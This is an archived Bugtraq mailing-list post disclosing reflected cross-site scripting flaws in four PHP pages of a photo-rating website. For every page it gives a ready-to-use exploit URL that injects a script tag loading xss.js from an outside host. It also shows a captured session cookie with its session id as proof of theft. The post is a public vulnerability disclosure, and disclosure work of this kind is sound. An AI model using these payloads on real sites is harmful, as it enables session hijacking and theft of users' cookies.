lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060613100102.11886.qmail@securityfocus.com>
Date: 13 Jun 2006 10:01:02 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Ratemylook.co.uk - XSS with session disclosure


Ratemylook.co.uk

Homepage:
http://www.ratemylook.co.uk

Affected files:
user.php4
top.php4
hot.php4
toponline.php4
------------------------------------------------

user.php4 XSS vuln with cookie disclosure:

http://www.ratemylook.co.uk/user.php4?uid=1150190681&mode=own">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<"

Screenshots:
http://www.youfucktard.com/xsp/ratemylook1.jpg
http://www.youfucktard.com/xsp/ratemylook2.jpg

--------------------------------------------------

top.php4 xss with cookie disclosure:

http://www.ratemylook.co.uk/top.php4?topshow=female&top=60&mode=top">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<" 

Screenshots:
http://www.youfucktard.com/xsp/ratemylook3.jpg
http://www.youfucktard.com/xsp/ratemylook4.jpg

------------------------------------------------

hot.php4 XSS vuln with cookie disclosure:

http://www.ratemylook.co.uk/hot.php4?topshow=female&top=20&mode=hot">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<"

-------------------------------------------------

toponline.php4 XSSvulnwith cookie disclosure:

http://www.ratemylook.co.uk/toponline.php4?topshow=female&top=40&mode=online">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<"

Our cookie:

This is remote text via xss.js located at youfucktard.com sid=fe0f38046fa4e406949c61c9650e923e; __utma=77460758.124649130.1150190458.1150190458.1150190458.1; __utmb=77460758; __utmc=77460758; __utmz=77460758.1150190458.1.1.utmccn=(referral)|utmcsr=allpictureratingsites.com|utmcct=/cgi-bin/jump2.cgi|utmcmd=referral


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ